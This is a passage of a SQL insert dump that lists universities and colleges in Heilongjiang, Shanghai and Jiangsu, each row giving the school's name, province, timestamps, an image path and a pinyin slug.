17:40:35','/images/school/default.png','heilongjiangyouershifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(659,'伊春职业学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','yichunzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(660,'牡丹江大学','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','mudanjiangdaxue',0,NULL,NULL,0,NULL,NULL),(661,'黑龙江职业学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','heilongjiangzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(662,'黑龙江建筑职业技术学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','heilongjiangjianzhuzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(663,'哈尔滨传媒职业学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','haerbinchuanmeizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(664,'哈尔滨江南职业技术学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','haerbinjiangnanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(665,'黑龙江农垦科技职业学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','heilongjiangnongkenkejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(666,'黑龙江交通职业技术学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','heilongjiangjiaotongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(667,'哈尔滨应用职业技术学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','haerbinyingyongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(668,'哈尔滨科学技术职业学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','haerbinkexuejishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(669,'黑龙江粮食职业学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','heilongjiangliangshizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(670,'佳木斯职业学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','jiamusizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(671,'哈尔滨工程技术职业学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','haerbingongchengjishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(672,'齐齐哈尔理工职业学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','qiqihaerligongzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(673,'哈尔滨华夏计算机职业技术学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','haerbinhuaxiajisuanjizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(674,'黑龙江艺术职业学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','heilongjiangyishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(675,'大庆职业学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','daqingzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(676,'黑龙江林业职业技术学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','heilongjianglinyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(677,'黑龙江农业职业技术学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','heilongjiangnongyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(678,'黑龙江农业工程职业学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','heilongjiangnongyegongchengzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(679,'黑龙江农垦职业学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','heilongjiangnongkenzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(680,'黑龙江司法警官职业学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','heilongjiangsifajingguanzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(681,'哈尔滨电力职业技术学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','haerbindianlizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(682,'哈尔滨铁道职业技术学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','haerbintiedaozhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(683,'大兴安岭职业学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','daxinganlingzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(684,'黑龙江农业经济职业学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','heilongjiangnongyejingjizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(685,'哈尔滨职业技术学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','haerbinzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(686,'黑龙江生物科技职业学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','heilongjiangshengwukejizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(687,'黑龙江商业职业学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','heilongjiangshangyezhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(688,'黑龙江公安警官职业学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','heilongjianggonganjingguanzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(689,'黑龙江信息技术职业学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','heilongjiangxinxijishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(690,'黑龙江旅游职业技术学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','heilongjianglvyouzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(691,'黑龙江三江美术职业学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','heilongjiangsanjiangmeishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(692,'黑龙江生态工程职业学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','heilongjiangshengtaigongchengzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(693,'黑龙江煤炭职业技术学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','heilongjiangmeitanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(694,'七台河职业学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','qitaihezhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(695,'黑龙江民族职业学院','黑龙江省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','heilongjiangminzuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(696,'复旦大学','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','fudandaxue',0,NULL,NULL,0,NULL,NULL),(697,'同济大学','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','tongjidaxue',0,NULL,NULL,0,NULL,NULL),(698,'上海交通大学','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghaijiaotongdaxue',0,NULL,NULL,0,NULL,NULL),(699,'华东理工大学','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','huadongligongdaxue',0,NULL,NULL,0,NULL,NULL),(700,'东华大学','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','donghuadaxue',0,NULL,NULL,0,NULL,NULL),(701,'华东师范大学','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','huadongshifandaxue',0,NULL,NULL,0,NULL,NULL),(702,'上海外国语大学','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghaiwaiguoyudaxue',0,NULL,NULL,0,NULL,NULL),(703,'上海财经大学','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/703.png','shanghaicaijingdaxue',0,NULL,NULL,0,NULL,NULL),(704,'上海理工大学','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghailigongdaxue',0,NULL,NULL,0,NULL,NULL),(705,'上海海事大学','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghaihaishidaxue',0,NULL,NULL,0,NULL,NULL),(706,'上海海洋大学','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghaihaiyangdaxue',0,NULL,NULL,0,NULL,NULL),(707,'上海中医药大学','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghaizhongyiyaodaxue',0,NULL,NULL,0,NULL,NULL),(708,'上海师范大学','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghaishifandaxue',0,NULL,NULL,0,NULL,NULL),(709,'上海对外经贸大学','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghaiduiwaijingmaodaxue',0,NULL,NULL,0,NULL,NULL),(710,'华东政法大学','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','huadongzhengfadaxue',0,NULL,NULL,0,NULL,NULL),(711,'上海大学','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghaidaxue',0,NULL,NULL,0,NULL,NULL),(712,'上海工程技术大学','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghaigongchengjishudaxue',0,NULL,NULL,0,NULL,NULL),(713,'上海纽约大学','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghainiuyuedaxue',0,NULL,NULL,0,NULL,NULL),(714,'上海海关学院','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghaihaiguanxueyuan',0,NULL,NULL,0,NULL,NULL),(715,'上海电力学院','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghaidianlixueyuan',0,NULL,NULL,0,NULL,NULL),(716,'上海应用技术大学','上海市','2014-04-23 00:00:00','2017-09-04 17:08:39','/images/school/default.png','shanghaiyingyongjishuxueyuan',0,NULL,NULL,0,NULL,NULL),(717,'上海体育学院','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghaitiyuxueyuan',0,NULL,NULL,0,NULL,NULL),(718,'上海音乐学院','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghaiyinlexueyuan',0,NULL,NULL,0,NULL,NULL),(719,'上海戏剧学院','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghaixijuxueyuan',0,NULL,NULL,0,NULL,NULL),(720,'上海立信会计金融学院','上海市','2014-04-23 00:00:00','2017-09-04 17:10:23','/images/school/default.png','shanghailixinhuijixueyuan',0,NULL,NULL,0,NULL,NULL),(721,'上海电机学院','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghaidianjixueyuan',0,NULL,NULL,0,NULL,NULL),(722,'上海金融学院','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghaijinrongxueyuan',0,NULL,NULL,0,NULL,NULL),(723,'上海杉达学院','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghaishandaxueyuan',0,NULL,NULL,0,NULL,NULL),(724,'上海商学院','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghaishangxueyuan',0,NULL,NULL,0,NULL,NULL),(725,'上海视觉艺术学院','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghaishijueyishuxueyuan',0,NULL,NULL,0,NULL,NULL),(726,'上海政法学院','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghaizhengfaxueyuan',0,NULL,NULL,0,NULL,NULL),(727,'上海第二工业大学','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghaidiergongyedaxue',0,NULL,NULL,0,NULL,NULL),(728,'上海建桥学院','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghaijianqiaoxueyuan',0,NULL,NULL,0,NULL,NULL),(729,'上海医疗器械高等专科学校','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghaiyiliaoqixiegaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(730,'上海旅游高等专科学校','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghailvyougaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(731,'上海公安学院','上海市','2014-04-23 00:00:00','2017-09-04 17:09:46','/images/school/default.png','shanghaigongangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(732,'上海出版印刷高等专科学校','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghaichubanyinshuagaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(733,'上海医药高等专科学校','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghaiyiyaogaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(734,'上海民航职业技术学院','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghaiminhangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(735,'上海东海职业技术学院','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghaidonghaizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(736,'上海新侨职业技术学院','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghaixinqiaozhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(737,'上海兴韦信息技术职业学院','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghaixingweixinxijishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(738,'上海体育职业学院','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghaitiyuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(739,'上海健康医学院','上海市','2014-04-23 00:00:00','2017-09-04 17:09:14','/images/school/default.png','shanghaijiankangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(740,'上海行健职业学院','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghaixingjianzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(741,'上海城市管理职业技术学院','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghaichengshiguanlizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(742,'上海交通职业技术学院','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghaijiaotongzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(743,'上海海事职业技术学院','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghaihaishizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(744,'上海电子信息职业技术学院','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghaidianzixinxizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(745,'上海震旦职业学院','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghaizhendanzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(746,'上海民远职业技术学院','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghaiminyuanzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(747,'上海欧华职业技术学院','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghaiouhuazhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(748,'上海思博职业技术学院','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghaisibozhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(749,'上海立达职业技术学院','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghailidazhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(750,'上海工艺美术职业学院','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghaigongyimeishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(751,'上海济光职业技术学院','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghaijiguangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(752,'上海工商外国语职业学院','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghaigongshangwaiguoyuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(753,'上海科学技术职业学院','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghaikexuejishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(754,'上海农林职业技术学院','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghainonglinzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(755,'上海邦德职业技术学院','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghaibangdezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(756,'上海中侨职业技术学院','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghaizhongqiaozhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(757,'上海建峰职业技术学院','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghaijianfengzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(758,'上海电影艺术职业学院','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghaidianyingyishuzhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(759,'上海中华职业技术学院','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghaizhonghuazhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(760,'上海工会管理职业学院','上海市','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shanghaigonghuiguanlizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(761,'南京大学','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','nanjingdaxue',0,NULL,NULL,0,NULL,NULL),(762,'东南大学','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','dongnandaxue',0,NULL,NULL,0,NULL,NULL),(763,'中国矿业大学','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhongguokuangyedaxue',0,NULL,NULL,0,NULL,NULL),(764,'河海大学','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','hehaidaxue',0,NULL,NULL,0,NULL,NULL),(765,'南京农业大学','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','nanjingnongyedaxue',0,NULL,NULL,0,NULL,NULL),(766,'中国药科大学','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhongguoyaokedaxue',0,NULL,NULL,0,NULL,NULL),(767,'江南大学','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','jiangnandaxue',0,NULL,NULL,0,NULL,NULL),(768,'南京航空航天大学','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','nanjinghangkonghangtiandaxue',0,NULL,NULL,0,NULL,NULL),(769,'南京理工大学','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','nanjingligongdaxue',0,NULL,NULL,0,NULL,NULL),(770,'苏州大学','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','suzhoudaxue',0,NULL,NULL,0,NULL,NULL),(771,'江苏科技大学','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','jiangsukejidaxue',0,NULL,NULL,0,NULL,NULL),(772,'南京工业大学','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','nanjinggongyedaxue',0,NULL,NULL,0,NULL,NULL),(773,'常州大学','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','changzhoudaxue',0,NULL,NULL,0,NULL,NULL),(774,'南京邮电大学','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','nanjingyoudiandaxue',0,NULL,NULL,0,NULL,NULL),(775,'南京林业大学','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','nanjinglinyedaxue',0,NULL,NULL,0,NULL,NULL),(776,'江苏大学','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','jiangsudaxue',0,NULL,NULL,0,NULL,NULL),(777,'南通大学','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','nantongdaxue',0,NULL,NULL,0,NULL,NULL),(778,'南京医科大学','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','nanjingyikedaxue',0,NULL,NULL,0,NULL,NULL),(779,'南京中医药大学','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','nanjingzhongyiyaodaxue',0,NULL,NULL,0,NULL,NULL),(780,'南京师范大学','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','nanjingshifandaxue',0,NULL,NULL,0,NULL,NULL),(781,'江苏师范大学','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','jiangsushifandaxue',0,NULL,NULL,0,NULL,NULL),(782,'南京财经大学','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','nanjingcaijingdaxue',0,NULL,NULL,0,NULL,NULL),(783,'扬州大学','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','yangzhoudaxue',0,NULL,NULL,0,NULL,NULL),(784,'西交利物浦大学','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','xijiaoliwupudaxue',0,NULL,NULL,0,NULL,NULL),(785,'南京森林警察学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','nanjingsenlinjingchaxueyuan',0,NULL,NULL,0,NULL,NULL),(786,'南京信息工程大学','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','nanjingxinxigongchengdaxue',0,NULL,NULL,0,NULL,NULL),(787,'盐城工学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','yanchenggongxueyuan',0,NULL,NULL,0,NULL,NULL),(788,'徐州医学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','xuzhouyixueyuan',0,NULL,NULL,0,NULL,NULL),(789,'苏州科技大学','江苏省','2014-04-23 00:00:00','2017-09-04 17:11:08','/images/school/default.png','suzhoukejixueyuan',0,NULL,NULL,0,NULL,NULL),(790,'淮阴师范学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','huaiyinshifanxueyuan',0,NULL,NULL,0,NULL,NULL),(791,'盐城师范学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','yanchengshifanxueyuan',0,NULL,NULL,0,NULL,NULL),(792,'江苏警官学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','jiangsujingguanxueyuan',0,NULL,NULL,0,NULL,NULL),(793,'南京体育学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','nanjingtiyuxueyuan',0,NULL,NULL,0,NULL,NULL),(794,'南京艺术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','nanjingyishuxueyuan',0,NULL,NULL,0,NULL,NULL),(795,'常熟理工学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','changshuligongxueyuan',0,NULL,NULL,0,NULL,NULL),(796,'金陵科技学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','jinlingkejixueyuan',0,NULL,NULL,0,NULL,NULL),(797,'淮阴工学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','huaiyingongxueyuan',0,NULL,NULL,0,NULL,NULL),(798,'徐州工程学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','xuzhougongchengxueyuan',0,NULL,NULL,0,NULL,NULL),(799,'常州工学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','changzhougongxueyuan',0,NULL,NULL,0,NULL,NULL),(800,'三江学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','sanjiangxueyuan',0,NULL,NULL,0,NULL,NULL),(801,'南京工程学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','nanjinggongchengxueyuan',0,NULL,NULL,0,NULL,NULL),(802,'南京审计大学','江苏省','2014-04-23 00:00:00','2017-09-04 17:11:36','/images/school/default.png','nanjingshenjixueyuan',0,NULL,NULL,0,NULL,NULL),(803,'南京晓庄学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','nanjingxiaozhuangxueyuan',0,NULL,NULL,0,NULL,NULL),(804,'江苏理工学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','jiangsuligongxueyuan',0,NULL,NULL,0,NULL,NULL),(805,'淮海工学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','huaihaigongxueyuan',0,NULL,NULL,0,NULL,NULL),(806,'泰州学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','taizhouxueyuan',0,NULL,NULL,0,NULL,NULL),(807,'无锡太湖学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','wuxitaihuxueyuan',0,NULL,NULL,0,NULL,NULL),(808,'江苏第二师范学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','jiangsudiershifanxueyuan',0,NULL,NULL,0,NULL,NULL),(809,'镇江市高等专科学校','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','zhenjiangshigaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(810,'徐州幼儿师范高等专科学校','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','xuzhouyouershifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(811,'连云港师范高等专科学校','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','lianyungangshifangaodengzhuankexuexiao',0,NULL,NULL,0,NULL,NULL),(812,'江苏城市职业学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','jiangsuchengshizhiyexueyuan',0,NULL,NULL,0,NULL,NULL),(813,'民办明达职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','minbanmingdazhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(814,'无锡职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','wuxizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(815,'江苏建筑职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','jiangsujianzhuzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(816,'南京工业职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','nanjinggongyezhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(817,'南通纺织职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','nantongfangzhizhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(818,'苏州工艺美术职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','suzhougongyimeishuzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(819,'连云港职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','lianyungangzhiyejishuxueyuan',0,NULL,NULL,0,NULL,NULL),(820,'南通职业大学','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','nantongzhiyedaxue',0,NULL,NULL,0,NULL,NULL),(821,'苏州职业大学','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','suzhouzhiyedaxue',0,NULL,NULL,0,NULL,NULL),(822,'沙洲职业工学院','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','shazhouzhiyegongxueyuan',0,NULL,NULL,0,NULL,NULL),(823,'扬州市职业大学','江苏省','2014-04-23 00:00:00','2015-10-16 17:40:35','/images/school/default.png','yangzhoushizhiyedaxue',0,NULL,NULL,0,NULL,NULL),(824,'泰州职业技术学院','江苏省','2014-04-23 00:00:00','2015-10-16 